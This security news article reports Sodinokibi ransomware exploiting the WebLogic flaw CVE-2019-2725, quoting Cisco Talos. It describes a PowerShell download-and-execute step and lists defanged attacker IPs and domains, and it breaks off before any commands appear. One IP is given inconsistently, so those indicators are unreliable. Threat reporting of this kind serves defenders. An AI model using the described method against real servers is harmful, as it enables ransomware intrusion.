Oracle WebLogic Servers are not the usual targets when it comes to cyber attacks. Besides, the service is a niche and is facing strong competition from the likes of Amazon with their AWS and Google with its fleet of web services. This time, a new ransomware variant named Sodinokibi has penetrated WebLogic Servers using a zero-day vulnerability as the loophole in security. It is a unique new way to propagate ransomware, given that a typical strain of ransomware infection requires the end-user to execute something. It may be an email attachment, a drive-by download of malicious code or due to misrepresented MS Office file that contained payload to download ransomware to the machine.
Sodinokibi samples found in Oracle WebLogic Servers takes advantage of a previously unknown vulnerability, then demands a $2,500 worth of Bitcoins after encrypting all the user files found in the machine. Just like other ransomware, a time-limited “offer” of two days is provided to the end-user to pay the ransom, delaying the payment beyond the first 48 hours means the files are no longer decryptable.
The worst part is the that some variants of Sodinokibi includes a companion malware, GandCrab. We had an extensive article about it last year, detailing how sophisticated it is in order to force users to submission of paying for the ransom to recover their encrypted files. Oracle issued an emergency patched under CVE-2019-2725, however not all customers how have WebLogic Servers were able to apply the patch on-time.
“This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco’s Incident Response (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi. Initial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. On April 26, 2019, the attackers made an HTTP connection to a different vulnerable server, requesting the AsyncResponderService of the Oracle WebLogic Server,” explained Pierre Cadieux and company from Cisco Talos team, the cybersecurity arm of Cisco Networks who investigated the incident.
Talos team revealed the prominent communication between the infected Oracle WebLogic Servers and these two IP addresses allegedly being controlled by Sodinokibi’s authors: 188.166.174(.)218 and 45.55.211(.)79, one phishing domain arg0s-co(.)uk and projectstore(.)guru, a fake website domain.
“The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident. Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136. The HTTP POST request contained arguments to a cmd.exe instruction — a PowerShell command to download a file called “radm.exe” from host 188.166.74[.]218, then save that file locally and execute it,” added Cadieux.
The malicious Windows Powershell commands are linked to download the specific “support files”: